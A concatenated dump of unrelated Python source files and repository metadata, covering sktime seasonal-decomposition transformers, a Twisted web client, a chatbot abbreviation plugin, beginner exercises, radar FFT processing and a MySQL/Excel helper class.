    def _transform(self, X, y=None):
        """Transform X and return a transformed version.

        private _transform containing the core logic, called from transform

        Parameters
        ----------
        X : pd.Series
            Data to be transformed
        y : ignored argument for interface compatibility
            Additional data, e.g., labels for transformation

        Returns
        -------
        Xt : pd.Series
            transformed version of X, detrended series
        """
        seasonal = self._align_seasonal(X)
        Xt = self._private_transform(X, seasonal)
        return Xt

    def _inverse_transform(self, X, y=None):
        """Logic used by `inverse_transform` to reverse transformation on `X`.

        Parameters
        ----------
        X : pd.Series or pd.DataFrame
            Data to be inverse transformed
        y : ignored argument for interface compatibility
            Additional data, e.g., labels for transformation

        Returns
        -------
        Xt : pd.Series or pd.DataFrame, same type as X
            inverse transformed version of X
        """
        seasonal = self._align_seasonal(X)
        Xt = self._private_inverse_transform(X, seasonal)
        return Xt

    def _update(self, X, y=None, update_params=False):
        """Update transformer with X and y.

        private _update containing the core logic, called from update

        Parameters
        ----------
        X : pd.Series
            Data to fit transform to
        y : ignored argument for interface compatibility
            Additional data, e.g., labels for transformation

        Returns
        -------
        self: a fitted instance of the estimator
        """
        X_full = X.combine_first(self._X)
        self._X = X_full
        if update_params:
            # Re-estimate seasonal components on the union of old and new data.
            # Bug fix: ``_fit`` takes no ``update_params`` argument, so the
            # previous call ``self._fit(X_full, update_params=update_params)``
            # raised TypeError whenever update_params was True.
            self._fit(X_full)
        return self

    @classmethod
    def get_test_params(cls, parameter_set="default"):
        """Return testing parameter settings for the estimator.

        Parameters
        ----------
        parameter_set : str, default="default"
            Name of the set of test parameters to return, for use in tests. If no
            special parameters are defined for a value, will return `"default"` set.
            There are currently no reserved values for transformers.

        Returns
        -------
        params : dict or list of dict, default = {}
            Parameters to create testing instances of the class
            Each dict are parameters to construct an "interesting" test instance, i.e.,
            `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.
            `create_test_instance` uses the first (or only) dictionary in `params`
        """
        params = {}
        params2 = {"sp": 2}
        return [params, params2]
class ConditionalDeseasonalizer(Deseasonalizer):
    """Remove seasonal components from time series, conditional on seasonality test.

    Fit tests for :term:`seasonality <Seasonality>` and if the passed time series
    has a seasonal component it applies seasonal decomposition provided by `statsmodels
    <https://www.statsmodels.org>`
    to compute the seasonal component.
    If the test is negative `_seasonal` is set
    to all ones (if `model` is "multiplicative")
    or to all zeros (if `model` is "additive").

    Transform aligns seasonal components stored in `seasonal_` with
    the time index of the passed series and then
    subtracts them ("additive" model) from the passed series
    or divides the passed series by them ("multiplicative" model).

    Parameters
    ----------
    seasonality_test : callable or None, default=None
        Callable that tests for seasonality and returns True when data is
        seasonal and False otherwise. If None,
        90% autocorrelation seasonality test is used.
    sp : int, default=1
        Seasonal periodicity.
    model : {"additive", "multiplicative"}, default="additive"
        Model to use for estimating seasonal component.

    Attributes
    ----------
    seasonal_ : array of length sp
        Seasonal components.
    is_seasonal_ : bool
        Return value of `seasonality_test`. True when data is
        seasonal and False otherwise.

    See Also
    --------
    Deseasonalizer

    Notes
    -----
    For further explanation on seasonal components and additive vs.
    multiplicative models see
    `Forecasting: Principles and Practice <https://otexts.com/fpp3/components.html>`_.
    Seasonal decomposition is computed using `statsmodels
    <https://www.statsmodels.org/stable/generated/statsmodels.tsa.seasonal.seasonal_decompose.html>`_.

    Examples
    --------
    >>> from sktime.transformations.series.detrend import ConditionalDeseasonalizer
    >>> from sktime.datasets import load_airline
    >>> y = load_airline()  # doctest: +SKIP
    >>> transformer = ConditionalDeseasonalizer(sp=12)  # doctest: +SKIP
    >>> y_hat = transformer.fit_transform(y)  # doctest: +SKIP
    """

    def __init__(self, seasonality_test=None, sp=1, model="additive"):
        self.seasonality_test = seasonality_test
        # set during _fit: outcome of the seasonality test on the training series
        self.is_seasonal_ = None
        super().__init__(sp=sp, model=model)

    def _check_condition(self, y):
        """Check if y meets condition."""
        if not callable(self.seasonality_test_):
            raise ValueError(
                f"`func` must be a function/callable, but found: "
                f"{type(self.seasonality_test_)}"
            )
        is_seasonal = self.seasonality_test_(y, sp=self.sp)
        if not isinstance(is_seasonal, (bool, np.bool_)):
            raise ValueError(
                f"Return type of `func` must be boolean, "
                f"but found: {type(is_seasonal)}"
            )
        return is_seasonal

    def _fit(self, X, y=None):
        """Fit transformer to X and y.

        private _fit containing the core logic, called from fit

        Parameters
        ----------
        X : pd.Series
            Data to fit transform to
        y : ignored argument for interface compatibility

        Returns
        -------
        self: a fitted instance of the estimator
        """
        from statsmodels.tsa.seasonal import seasonal_decompose

        self._X = X
        sp = self.sp
        # set default condition
        if self.seasonality_test is None:
            self.seasonality_test_ = autocorrelation_seasonality_test
        else:
            self.seasonality_test_ = self.seasonality_test
        # check if data meets condition
        self.is_seasonal_ = self._check_condition(X)
        if self.is_seasonal_:
            # if condition is met, apply de-seasonalisation
            self.seasonal_ = seasonal_decompose(
                X,
                model=self.model,
                period=sp,
                filt=None,
                two_sided=True,
                extrapolate_trend=0,
            ).seasonal.iloc[:sp]
        else:
            # otherwise, set idempotent seasonal components
            # (zeros for additive / ones for multiplicative leave X unchanged)
            self.seasonal_ = (
                np.zeros(self.sp) if self.model == "additive" else np.ones(self.sp)
            )
        return self
class STLTransformer(BaseTransformer):
    """Remove seasonal components from a time-series using STL.

    Interfaces STL from statsmodels as an sktime transformer.

    The STLTransformer is a descriptive transformer to remove seasonality
    from a series and is based on statsmodels.STL. It returns deseasonalized
    data. Components are returned in addition if return_components=True

    STLTransformer can not inverse_transform on indices not seen in fit().
    This means that for pipelining, the Deseasonalizer or Detrender must be
    used instead of STLTransformer.

    Important note: the returned series has seasonality removed, but not trend.

    Parameters
    ----------
    sp : int, default=1
        Seasonal periodicity.
    seasonal : int, default=7
        Length of the seasonal smoother. Must be an odd integer, and should
        normally be >= 7 (default).
    trend : {int, default=None}
        Length of the trend smoother. Must be an odd integer. If not provided
        uses the smallest odd integer greater than
        1.5 * period / (1 - 1.5 / seasonal), following the suggestion in
        the original implementation.
    low_pass : {int, default=None}
        Length of the low-pass filter. Must be an odd integer >=3. If not
        provided, uses the smallest odd integer > period.
    seasonal_deg : int, default=1
        Degree of seasonal LOESS. 0 (constant) or 1 (constant and trend).
    trend_deg : int, default=1
        Degree of trend LOESS. 0 (constant) or 1 (constant and trend).
    low_pass_deg : int, default=1
        Degree of low pass LOESS. 0 (constant) or 1 (constant and trend).
    robust : bool, default False
        Flag indicating whether to use a weighted version that is robust to
        some forms of outliers.
    seasonal_jump : int, default=1
        Positive integer determining the linear interpolation step. If larger
        than 1, the LOESS is used every seasonal_jump points and linear
        interpolation is between fitted points. Higher values reduce
        estimation time.
    trend_jump : int, default=1
        Positive integer determining the linear interpolation step. If larger
        than 1, the LOESS is used every trend_jump points and values between
        the two are linearly interpolated. Higher values reduce estimation
        time.
    low_pass_jump : int, default=1
        Positive integer determining the linear interpolation step. If larger
        than 1, the LOESS is used every low_pass_jump points and values between
        the two are linearly interpolated. Higher values reduce estimation
        time.
    return_components : bool, default=False
        if False, will return only the STL transformed series
        if True, will return the transformed series, as well as three components
            as variables in the returned multivariate series (DataFrame cols)
            "transformed" - the transformed series
            "seasonal" - the seasonal component
            "trend" - the trend component
            "resid" - the residuals after de-trending, de-seasonalizing

    Attributes
    ----------
    trend_ : pd.Series
        Trend component of series seen in fit.
    seasonal_ : pd.Series
        Seasonal components of series seen in fit.
    resid_ : pd.Series
        Residuals component of series seen in fit.

    See Also
    --------
    Detrender
    Deseasonalizer
    STLForecaster

    References
    ----------
    .. [1] https://www.statsmodels.org/devel/generated/statsmodels.tsa.seasonal.STL.html

    Examples
    --------
    >>> from sktime.datasets import load_airline
    >>> from sktime.transformations.series.detrend import STLTransformer
    >>> X = load_airline()  # doctest: +SKIP
    >>> transformer = STLTransformer(sp=12)  # doctest: +SKIP
    >>> Xt = transformer.fit_transform(X)  # doctest: +SKIP
    """

    _tags = {
        "scitype:transform-input": "Series",
        # what is the scitype of X: Series, or Panel
        "scitype:transform-output": "Series",
        # what scitype is returned: Primitives, Series, Panel
        "scitype:instancewise": True,  # is this an instance-wise transform?
        "X_inner_mtype": "pd.Series",  # which mtypes do _fit/_predict support for X?
        "y_inner_mtype": "pd.Series",  # which mtypes do _fit/_predict support for y?
        "transform-returns-same-time-index": True,
        "univariate-only": True,
        "fit_is_empty": False,
        "python_dependencies": "statsmodels",
    }

    def __init__(
        self,
        sp=2,
        seasonal=7,
        trend=None,
        low_pass=None,
        seasonal_deg=1,
        trend_deg=1,
        low_pass_deg=1,
        robust=False,
        seasonal_jump=1,
        trend_jump=1,
        low_pass_jump=1,
        return_components=False,
    ):
        self.sp = check_sp(sp)

        # The statsmodels.tsa.seasonal.STL can only deal with sp >= 2
        if sp < 2:
            raise ValueError("sp must be positive integer >= 2")

        self.seasonal = seasonal
        self.trend = trend
        self.low_pass = low_pass
        self.seasonal_deg = seasonal_deg
        self.trend_deg = trend_deg
        self.low_pass_deg = low_pass_deg
        self.robust = robust
        self.seasonal_jump = seasonal_jump
        self.trend_jump = trend_jump
        self.low_pass_jump = low_pass_jump
        self.return_components = return_components
        self._X = None
        super().__init__()

    def _fit(self, X, y=None):
        """Fit transformer to X and y.

        private _fit containing the core logic, called from fit

        Parameters
        ----------
        X : pd.Series
            Data to fit transform to
        y : ignored argument for interface compatibility

        Returns
        -------
        self: a fitted instance of the estimator
        """
        from statsmodels.tsa.seasonal import STL as _STL

        # remember X for transform
        self._X = X
        sp = self.sp

        self.stl_ = _STL(
            X.values,
            period=sp,
            seasonal=self.seasonal,
            trend=self.trend,
            low_pass=self.low_pass,
            seasonal_deg=self.seasonal_deg,
            trend_deg=self.trend_deg,
            low_pass_deg=self.low_pass_deg,
            robust=self.robust,
            seasonal_jump=self.seasonal_jump,
            trend_jump=self.trend_jump,
            low_pass_jump=self.low_pass_jump,
        ).fit()

        self.seasonal_ = pd.Series(self.stl_.seasonal, index=X.index)
        self.resid_ = pd.Series(self.stl_.resid, index=X.index)
        self.trend_ = pd.Series(self.stl_.trend, index=X.index)
        return self

    def _transform(self, X, y=None):
        """Deseasonalize X; refit STL on the union of indices if X has unseen ones."""
        from statsmodels.tsa.seasonal import STL as _STL

        # fit again if indices not seen, but don't store anything
        if not X.index.equals(self._X.index):
            X_full = X.combine_first(self._X)
            new_stl = _STL(
                X_full.values,
                period=self.sp,
                seasonal=self.seasonal,
                trend=self.trend,
                low_pass=self.low_pass,
                seasonal_deg=self.seasonal_deg,
                trend_deg=self.trend_deg,
                low_pass_deg=self.low_pass_deg,
                robust=self.robust,
                seasonal_jump=self.seasonal_jump,
                trend_jump=self.trend_jump,
                low_pass_jump=self.low_pass_jump,
            ).fit()
            ret_obj = self._make_return_object(X_full, new_stl)
        else:
            ret_obj = self._make_return_object(X, self.stl_)
        return ret_obj

    def _inverse_transform(self, X, y=None):
        """Add the stored seasonal component back onto X (fit indices only)."""
        if not self._X.index.equals(X.index):
            raise NotImplementedError(
                """
                STLTransformer is only a descriptive transformer and
                can only inverse_transform data that was given in fit().
                Please use Deseasonalizer or Detrender."""
            )
        # Bug fix: the inverse must operate on X, the series passed in.
        # The previous code returned ``y + self.seasonal_``; ``y`` defaults to
        # None in this interface, so inverse_transform always raised TypeError.
        # Only seasonality is re-added because _transform only removed it.
        return X + self.seasonal_

    def _make_return_object(self, X, stl):
        # deseasonalize only (trend is deliberately left in the series)
        transformed = pd.Series(X.values - stl.seasonal, index=X.index)

        if self.return_components:
            seasonal = pd.Series(stl.seasonal, index=X.index)
            resid = pd.Series(stl.resid, index=X.index)
            trend = pd.Series(stl.trend, index=X.index)

            ret = pd.DataFrame(
                {
                    "transformed": transformed,
                    "seasonal": seasonal,
                    "trend": trend,
                    "resid": resid,
                }
            )
        else:
            ret = transformed

        return ret

    @classmethod
    def get_test_params(cls, parameter_set="default"):
        """Return testing parameter settings for the estimator.

        Parameters
        ----------
        parameter_set : str, default="default"
            Name of the set of test parameters to return, for use in tests. If no
            special parameters are defined for a value, will return `"default"` set.
            (Added for consistency with the other transformers in this module.)

        Returns
        -------
        params : dict or list of dict, default = {}
            Parameters to create testing instances of the class
            Each dict are parameters to construct an "interesting" test instance, i.e.,
            `MyClass(**params)` or `MyClass(**params[i])` creates a valid test instance.
            `create_test_instance` uses the first (or only) dictionary in `params`
        """
        # test case 1: all default parmameters
        params1 = {}
        # test case 2: return all components
        params2 = {"return_components": True}
        # test case 3: seasonality parameter set, from the skipped doctest
        params3 = {"sp": 12}
        return [params1, params2, params3]
| [
"noreply@github.com"
] | sktime.noreply@github.com |
e509840b1f2036dd4d4fd2e934b4c8f66f9a6d4a | e7e800dc3de419e9636b3204da7c43a076bc4a89 | /webclient.py | 90d2471da9f6b20015c0b1e84170b4e116afad73 | [] | no_license | BasalGanglia/twistedfinger | 349c9626e60c92f1eb4a7e84ae819553ba21892d | 301ea29c1b980afe068e782f98e4011ff6ad9dba | refs/heads/master | 2020-03-19T13:57:17.070932 | 2018-06-12T08:51:45 | 2018-06-12T08:51:45 | 136,602,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 532 | py | from __future__ import print_function
from twisted.internet import reactor
from twisted.web.client import Agent
from twisted.web.http_headers import Headers
agent = Agent(reactor)
d = agent.request(
b'GET',
b'http://localhost/ilkka/test/:8000',
#b'GET',
#b'http://google.com',
Headers({'User-Agent': ['Twisted Web Client Example']}),
None)
def cbResponse(ignored):
print('Response received')
d.addCallback(cbResponse)
def cbShutdown(ignored):
reactor.stop()
d.addBoth(cbShutdown)
reactor.run() | [
"ilkka.kosunen@gmail.com"
] | ilkka.kosunen@gmail.com |
a5f0b3191bcadf185372843a5c817ae11372a54b | 146db0a1ba53d15ab1a5c3dce5349907a49217c3 | /omega_miya/plugins/nbnhhsh/__init__.py | 7866c153d40576e1b4b45923a629b974818a5e08 | [
"Python-2.0",
"MIT"
] | permissive | hailong-z/nonebot2_miya | 84d233122b2d785bfc230c4bfb29326844700deb | 7d52ef52a0a13c5ac6519199e9146a6e3c80bdce | refs/heads/main | 2023-03-26T14:59:31.107103 | 2021-03-09T17:01:08 | 2021-03-09T17:01:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,827 | py | import re
from nonebot import on_command, export, logger
from nonebot.typing import T_State
from nonebot.adapters.cqhttp.bot import Bot
from nonebot.adapters.cqhttp.event import GroupMessageEvent
from nonebot.adapters.cqhttp.permission import GROUP
from omega_miya.utils.Omega_plugin_utils import init_export
from omega_miya.utils.Omega_plugin_utils import has_command_permission, permission_level
from .utils import get_guess
# Custom plugin usage text
__plugin_name__ = '好好说话'
__plugin_usage__ = r'''【能不能好好说话?】
拼音首字母缩写释义
**Permission**
Command & Lv.30
**Usage**
/好好说话 [缩写]'''

# Init plugin export
init_export(export(), __plugin_name__, __plugin_usage__)

# Register the command responder (aliases /hhsh, /nbnhhsh); group chats only,
# gated on command permission and a minimum permission level of 30.
nbnhhsh = on_command('好好说话', rule=has_command_permission() & permission_level(level=30), aliases={'hhsh', 'nbnhhsh'},
                     permission=GROUP, priority=20, block=True)


# Override the default argument parser for this command.
@nbnhhsh.args_parser
async def parse(bot: Bot, event: GroupMessageEvent, state: T_State):
    """Parse a follow-up message into the currently awaited argument slot.

    Re-prompts on empty input and finishes early on the cancel keyword.
    """
    args = str(event.get_plaintext()).strip().lower().split()
    if not args:
        # reject() raises internally, so execution stops here on empty input
        await nbnhhsh.reject('你似乎没有发送有效的参数呢QAQ, 请重新发送:')
    state[state["_current_key"]] = args[0]
    if state[state["_current_key"]] == '取消':
        await nbnhhsh.finish('操作已取消')


@nbnhhsh.handle()
async def handle_first_receive(bot: Bot, event: GroupMessageEvent, state: T_State):
    """Handle the initial command message; accept at most one argument."""
    args = str(event.get_plaintext()).strip().lower().split()
    if not args:
        # no argument yet -- fall through so the got() step prompts for one
        pass
    elif args and len(args) == 1:
        state['guess'] = args[0]
    else:
        await nbnhhsh.finish('参数错误QAQ')


@nbnhhsh.got('guess', prompt='有啥缩写搞不懂?')
async def handle_nbnhhsh(bot: Bot, event: GroupMessageEvent, state: T_State):
    """Look up the abbreviation remotely and reply with its known expansions."""
    guess = state['guess']
    # only alphanumeric abbreviations are accepted by the lookup service
    if re.match(r'^[a-zA-Z0-9]+$', guess):
        res = await get_guess(guess=guess)
        if res.success() and res.result:
            try:
                data = dict(res.result[0])
            except Exception as e:
                logger.error(f'nbnhhsh error: {repr(e)}')
                await nbnhhsh.finish('发生了意外的错误QAQ, 请稍后再试')
                return
            # prefer confirmed translations; fall back to crowd-sourced guesses
            if data.get('trans'):
                trans = str.join('\n', data.get('trans'))
                msg = f"为你找到了{guess}的以下解释:\n\n{trans}"
                await nbnhhsh.finish(msg)
            elif data.get('inputting'):
                trans = str.join('\n', data.get('inputting'))
                msg = f"为你找到了{guess}的以下解释:\n\n{trans}"
                await nbnhhsh.finish(msg)
        await nbnhhsh.finish(f'没有找到{guess}的相关解释QAQ')
    else:
        await nbnhhsh.finish('缩写仅支持字母加数字, 请重新输入')
| [
"ailitonia@gmail.com"
] | ailitonia@gmail.com |
29d68c117848a99093caea9576f255c3fd233bb3 | c7fc1265dd09cae456c978c09643811bf3aa89d7 | /mileage_cal.py | 722bfc599c73d4858c72caed5ac2bbc36aa3fabd | [] | no_license | chandraprakashh/Data_Handling | e136c6bc188506ca6660becd434d5a17bed8e199 | 59f43288dea379f8fe0bb0fe01b17d0e5e99e057 | refs/heads/master | 2020-07-18T18:11:25.908312 | 2020-01-13T10:24:51 | 2020-01-13T10:24:51 | 206,290,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 566 | py | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
"""
1.Code Challenge
Name:
Gas Mileage Calculator
Filename:
mileage_cal.py
Problem Statement:
Assume my car travels 100 Kilometres after putting 5 litres of fuel.
Calculate the average of my car.
Hint:
Divide kilmeters by the litres used to get the average
"""
#car travels 100 Kilometres
distance = 100
#putting 5 litres of fuel
fuel= 5
#average
average= distance/fuel
print("avreage my car ={}".format(average))
| [
"noreply@github.com"
] | chandraprakashh.noreply@github.com |
3b9c2b97c211502ed2c84f7a565b788565349690 | 9071b1dad5e1aee8d0246b07db767368a48a4542 | /PCC Chapter 5/5-4.py | 59c6a1dba791630ca2cceb3b4bc55429a3b477d2 | [] | no_license | usmansabir98/AI-Semester-101 | 01b4b2ae924f2fe9d6edf8ad260a741f1b0ba42c | 8b7e78ffd610b0712c5a3249a7fa1fbb99e0a24c | refs/heads/master | 2021-09-07T04:47:08.410275 | 2018-02-17T17:39:14 | 2018-02-17T17:39:14 | 115,215,481 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | # 5-4. Alien Colors #2: Choose a color for an alien as you did in Exercise 5-3, and
# write an if-else chain.
# • If the alien’s color is green, print a statement that the player just earned
# 5 points for shooting the alien.
# • If the alien’s color isn’t green, print a statement that the player just earned
# 10 points.
# • Write one version of this program that runs the if block and another that
# runs the else block.
def test_color(color):
if color=='green':
print("You earned 5 points")
else:
print("You earned 10 points")
# Exercise the if-branch: green aliens award 5 points.
alien_color= 'green'
test_color(alien_color)
# Exercise the else-branch: any non-green color awards 10 points.
alien_color = 'yellow'
test_color(alien_color)
| [
"usmansabir98@hotmail.com"
] | usmansabir98@hotmail.com |
ea4a74d9db2d97d5f67d3b44f4e0dfad9d27cf2c | 5aa27ee23ca28e66a8590d44ec8287db26e59e99 | /venv/bin/stream_naver | a5a4ca992b0fa481c184d4a097779a8412c582ac | [] | no_license | denhur62/TFIDF_mecab | fe56191819ca1347fa5f91ceefc7447dd8e19a4c | e9eb17ac7de70798ee5621af24866c04604ca4b2 | refs/heads/main | 2023-07-01T11:34:06.492438 | 2021-08-08T07:31:28 | 2021-08-08T07:31:28 | 393,447,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | #!/Users/denhur62/Documents/GitHub/TFIDF-mecab/venv/bin/python3
# -*- coding: utf-8 -*-
# Console-script shim (setuptools-style, judging by the argv[0] rewrite):
# delegates to konlpy's Naver streaming entry point.
import re
import sys
from konlpy.stream.naver import main
if __name__ == '__main__':
    # Strip the "-script.pyw"/".exe" suffixes that Windows launchers append,
    # so the delegated main() sees a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"denhur62@naver.com"
] | denhur62@naver.com | |
8d4d1e3177e0d876bf1acd5a951eac101297b9f6 | 16c092aab67f1ff6a92adf48ce8b8054ce51d7ba | /simulator/processing/range_processing.py | 438a1feaa29e856c5049487f2ccdd7823c0505f0 | [] | no_license | yukkkkun/Radarsimulation | 3d40c8671a38b340178da76689336b974084aab9 | 23052c7869c113c962b600496b6392e3afa1b167 | refs/heads/master | 2022-12-19T04:19:29.745745 | 2020-10-04T09:52:51 | 2020-10-04T09:52:51 | 287,907,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,208 | py | import numpy as np
def range_resolution(num_adc_samples, dig_out_sample_rate=2500, freq_slope_const=60.012):
    """Compute the range resolution and chirp bandwidth for a radar config.

    Args:
        num_adc_samples (int): The number of given ADC samples in a chirp
        dig_out_sample_rate (int): The ADC sample rate (ksps)
        freq_slope_const (float): The slope of the freq increase in each chirp (MHz/us)

    Returns:
        tuple [float, float]:
            range_resolution (float): The range resolution for this bin (metres)
            band_width (float): The bandwidth of the radar chirp config (Hz)
    """
    speed_of_light = 299792458  # m/s
    # Time spent sampling one chirp, in microseconds.
    sample_period_usec = 1000.0 / dig_out_sample_rate * num_adc_samples
    # Swept bandwidth in Hz: slope (MHz/us) * period (us) * 1e6.
    band_width = freq_slope_const * sample_period_usec * 1e6
    # Standard FMCW relation: dR = c / (2 * B).
    resolution = speed_of_light / (2.0 * band_width)
    return resolution, band_width
def range_processing(adc_data, window_type_1d=None, axis=-1):
    """Perform 1D FFT on complex-format ADC data.

    Perform optional windowing and 1D FFT on the ADC data.

    Args:
        adc_data (ndarray): (num_chirps_per_frame, num_rx_antennas, num_adc_samples). Performed on each frame. adc_data
                            is in complex by default. Complex is float32/float32 by default.
        window_type_1d (mmwave.dsp.utils.Window): Optional window type on 1D FFT input. Default is None. Can be selected
                                                from Bartlett, Blackman, Hanning and Hamming.

    Returns:
        radar_cube (ndarray): (num_chirps_per_frame, num_rx_antennas, num_range_bins). Also called fft_1d_out
    """
    # windowing numA x numB suggests the coefficients is numA-bits while the
    # input and output are numB-bits. Same rule applies to the FFT.
    fft1d_window_type = window_type_1d
    if fft1d_window_type:
        # NOTE(review): ``utils`` is never imported in this module (only numpy
        # is), so passing a window type currently raises NameError. This needs
        # ``from mmwave.dsp import utils`` (or a local windowing helper) to
        # actually work -- confirm and fix the import.
        fft1d_in = utils.windowing(adc_data, fft1d_window_type, axis=axis)
    else:
        fft1d_in = adc_data
    # Note: np.fft.fft is a 1D operation, using higher dimension input defaults to slicing last axis for transformation
    radar_cube = np.fft.fft(fft1d_in, axis=axis)
    return radar_cube
"yutaka.higashis3@gmail.com"
] | yutaka.higashis3@gmail.com |
91d2c06e9e6783e4b3605f0da5fa10130d04e780 | b9c6ee69df8b1cf73ac468afe5b32eb2ececefb6 | /suitaby/data/__init__.py | 7fe2c41a665e74a4536aac47b387a58c3bf5258c | [] | no_license | velix/suitaby_python_tools | 7d068417b8a66a0477cb21a9a7b79e8f144a695b | 2aabc88f7f2880cbd029118ee53f76c6164ac82b | refs/heads/master | 2021-01-21T08:05:32.495106 | 2015-10-10T18:24:59 | 2015-10-10T18:24:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | py | #from IO import IO
#from FormatChecker import FormatChecker
#from Sizes import Sizes
#from Generator import Generator
#from DBHelper import DBHelper
#from Tester import Tester
#from People import People
#from SizeCatalog import SizeCatalog
| [
"panosracing@hotmail.com"
] | panosracing@hotmail.com |
4abd4f456948302874dfdc97f41babf31670d96a | 4786fe9537fbcb50b7490f7f95624e9c8589801f | /ex21a.py | b80932994d975a1f5b8f8cfd3bbc785b73fc603b | [] | no_license | dbialon/LPTHW | 075e5a82c541dd277ee30f5ebbc221e30c63e29e | 3e6674cded2bcd90d4a098efd00a71abeb33bdc5 | refs/heads/master | 2022-06-07T02:14:18.180807 | 2020-05-02T13:30:52 | 2020-05-02T13:30:52 | 259,911,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | def add(a, b):
print(f"ADDING {a} + {b}")
return a + b
def subtract(a, b):
    """Announce the operation being performed, then return the difference a - b."""
    print("SUBTRACTING {} - {}".format(a, b))
    return a - b
def multiply(a, b):
    """Announce the operation being performed, then return the product a * b."""
    print("MULTIPLYING {} * {}".format(a, b))
    return a * b
def divide(a, b):
    """Announce the operation being performed, then return the true quotient a / b."""
    print("DIVIDING {} / {}".format(a, b))
    return a / b
print("""
This programm will execute the following calculation:
(A - B) / C * D + E
""")
varA = float(input("What is your A? --- "))
varB = float(input("What is your B? --- "))
varC = float(input("What is your C? --- "))
varD = float(input("What is your D? --- "))
varE = float(input("What is your E? --- "))
print()
result = add(multiply(divide(subtract(varA, varB), varC), varD), varE)
print("\nThat becomes:", result) | [
"dbialon79@outlook.com"
] | dbialon79@outlook.com |
853783386fe7499ba2d42b810f0108c2fa98a501 | 5d02f39266d59d46a3b3b3526cdcbfa2b4089a8c | /db_excel/excel.py | 459b0f37c3dc01581f0aa1e72665eae7b9532128 | [] | no_license | gesang08/OperateMysqlAndExcel | dd4cbc2955cbbb982ed903ec7ccb5c2c12011e60 | 34502546d5fcb0058e5bf22178d4ed5290b021ab | refs/heads/master | 2020-05-27T21:31:09.518216 | 2019-10-12T11:56:42 | 2019-10-12T11:56:42 | 188,792,357 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,363 | py | #!/usr/bin/env python
# _*_ coding: UTF-8 _*_
"""
实现操作数据库的类,可将从数据库获得的以字段为键,以字段内容为值的存储格式数据;
实现对excel表的创建,读取,写入,追加的类
"""
import MySQLdb
import MySQLdb.cursors
import os
import xlwt
import xlrd
import xlutils.copy # xlutils 读入一个excel文件,然后进行修改或追加,不能操作xlsx,只能操作xls
# Default MySQL connection settings, used by database() when the caller
# does not override them.
# NOTE(review): credentials are hard-coded in source; consider moving them
# to configuration or environment variables.
SERVER_IP = '127.0.0.1'
USER = 'root'
PASSWORD = '12345678'
DB = 'gs_package'
PORT = 3306
CHARSET = 'utf8'
def main():
    # Ad-hoc smoke test: pull every packaging row from order_part_online
    # and dump the excel helper's contents.  (Python 2 print statement.)
    sql = "SELECT `Contract_id`, `Order_id`, `Sec_id`, `Part_id`, `Door_type`, `Door_height`, `Door_width`, `Door_thick`, `Package_state`, `Element_type_id` FROM `order_part_online` WHERE 1"
    db = database()
    ex = operate_excel(excel_file_name='data.xls')
    q = db.get_more_row(sql)
    # ex.write_excel(q)
    print ex.read_excel()
    # ex.append_excel()
    # for i in range(len(q)):
    #     print q
class database(object):
    """Thin wrapper around MySQLdb for connecting and running queries.

    Connection parameters fall back to the module-level defaults
    (SERVER_IP, USER, PASSWORD, DB, PORT, CHARSET) when not supplied.
    Written for Python 2 (uses ``except Exception, e`` syntax).
    """
    # Note: Python's self is the equivalent of 'this' in other languages.
    def __init__(self, log=None, dbhost=None, dbname=None, user=None, password=None, port=None, charset=None):
        self._logger = log
        # None here plays the role of NULL in other languages.
        self._dbhost = SERVER_IP if dbhost is None else dbhost
        self._dbname = DB if dbname is None else dbname
        self._user = USER if user is None else user
        self._password = PASSWORD if password is None else password
        self._port = PORT if port is None else port
        self._charset = CHARSET if charset is None else charset
        self.conn = None
        self.get_conn_result = self.is_connection_db()
        if self.get_conn_result:  # Only grab a cursor once the connection succeeded.
            self._cursor = self.conn.cursor()
    def is_connection_db(self, get_data_method='dict'):
        """Open the MySQL connection; return True on success, False otherwise.

        get_data_method -- 'dict' (default) makes rows come back as
        {column_name: value} dicts; 'tuple' returns plain tuples.
        """
        try:
            if get_data_method == 'dict':
                # With DictCursor:
                # 1. fetchone() returns a dict keyed by column name;
                # 2. fetchall() returns a tuple of such dicts.
                self.conn = MySQLdb.connect(host=self._dbhost,
                                            user=self._user,
                                            passwd=self._password,
                                            db=self._dbname,
                                            port=self._port,
                                            cursorclass=MySQLdb.cursors.DictCursor,
                                            charset=self._charset,
                                            )
            elif get_data_method == 'tuple':
                self.conn = MySQLdb.connect(host=self._dbhost,
                                            user=self._user,
                                            passwd=self._password,
                                            db=self._dbname,
                                            port=self._port,
                                            charset=self._charset,
                                            )
            else:
                self._logger.warn("please give correct method for getting data!")
                return False
        except Exception, e:
            self._logger.warn("query database exception,%s" % e)
            return False
        else:
            return True
    def get_more_row(self, sql):
        """Run *sql* and return all rows; False on empty result or error.

        NOTE(review): the cursor and connection are closed after the first
        query, so a database instance is effectively single-use -- confirm
        that callers never reuse one.
        """
        record = ""
        if self.get_conn_result:
            try:
                self._cursor.execute(sql)
                record = self._cursor.fetchall()  # Fetch every row of the result set.
                if record == () or record is None:
                    record = False
                self._cursor.close()  # Close the cursor ...
                self.conn.close()  # ... and the connection.
            except Exception, e:
                record = False
                self._logger.warn("query database exception,sql= %s,%s" % (sql, e))
        return record
    def get_one_row(self, sql):
        """Run *sql* and return a single row; False on empty result or error."""
        record = ""
        if self.get_conn_result:
            try:
                self._cursor.execute(sql)
                record = self._cursor.fetchone()  # Fetch only the first row.
                if record == () or record is None:
                    record = False
                self._cursor.close()  # Close the cursor ...
                self.conn.close()  # ... and the connection.
            except Exception, e:
                record = False
                self._logger.warn("query database exception,sql= %s,%s" % (sql, e))
        return record
    def modify_sql(self, sql):
        """Execute an UPDATE/INSERT/DELETE statement and commit.

        Returns True on success, False on failure.
        """
        flag = False
        if self.get_conn_result:
            try:
                self._cursor.execute(sql)
                self.conn.commit()
                flag = True
            except Exception, e:
                flag = False
